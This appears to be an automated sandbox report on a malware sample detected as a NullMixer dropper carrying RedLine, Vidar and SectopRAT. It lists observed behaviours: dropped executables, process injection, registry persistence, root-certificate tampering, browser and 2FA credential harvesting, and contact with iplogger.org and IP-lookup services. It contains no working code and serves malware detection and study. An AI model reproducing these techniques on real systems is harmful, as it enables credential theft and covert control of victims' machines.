Malware Analysis Report

2025-01-02 06:04

Sample ID 241207-k73yza1qhl
Target d1adee00a2745df94375ba4d0026c637_JaffaCakes118
SHA256 486d5231a35dc4e4cb3417a1353c300298824a9df98890a100c596e7c1186aa5
Tags
nullmixer privateloader redline sectoprat vidar build1 aspackv2 discovery dropper execution infostealer loader persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

486d5231a35dc4e4cb3417a1353c300298824a9df98890a100c596e7c1186aa5

Threat Level: Known bad

The file d1adee00a2745df94375ba4d0026c637_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

nullmixer privateloader redline sectoprat vidar build1 aspackv2 discovery dropper execution infostealer loader persistence rat spyware stealer trojan

Redline family

RedLine

Vidar

Privateloader family

Nullmixer family

Vidar family

NullMixer

PrivateLoader

RedLine payload

SectopRAT payload

SectopRAT

Sectoprat family

Vidar Stealer

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

ASPack v2.12-2.42

Reads user/profile data of web browsers

Checks computer location settings

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Checks installed software on the system

Looks up external IP address via web service

Accesses 2FA software files, possible credential harvesting

Suspicious use of SetThreadContext

Drops file in Windows directory

System Location Discovery: System Language Discovery

Program crash

Browser Information Discovery

Enumerates physical storage devices

Unsigned PE

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Modifies system certificate store

Suspicious use of SendNotifyMessage

Checks SCSI registry key(s)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Modifies data under HKEY_USERS

Scheduled Task/Job: Scheduled Task

Checks processor information in registry

Modifies Internet Explorer settings

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-07 09:15

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-07 09:15

Reported

2024-12-07 09:18

Platform

win7-20240903-en

Max time kernel

58s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe"

Signatures

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Vidar

stealer vidar

Vidar family

vidar

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\97c06d9b6fa6f9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\97c06d9b6fa6f9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e1.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\17e6077dcf7a402.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\17e6077dcf7a402.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\f08378aa2c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\f08378aa2c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\17e6077dcf7a402.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\17e6077dcf7a402.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\17e6077dcf7a402.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\97c06d9b6fa6f9.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\97c06d9b6fa6f9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A

Reads user/profile data of web browsers

spyware stealer

Accesses 2FA software files, possible credential harvesting

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7zS434E1686\0637ac7677d0cf7.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A api.db-ip.com N/A N/A
N/A api.db-ip.com N/A N/A
N/A ipinfo.io N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2220 set thread context of 2180 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS434E1686\f08378aa2c3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS434E1686\97c06d9b6fa6f9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS434E1686\17e6077dcf7a402.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS434E1686\17e6077dcf7a402.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e1.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{EBB58E41-B47B-11EF-9D9B-465533733A50} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e1.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e1.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e1.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\61d1121b032c3d74.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\d5a6f77b01f6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3048 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
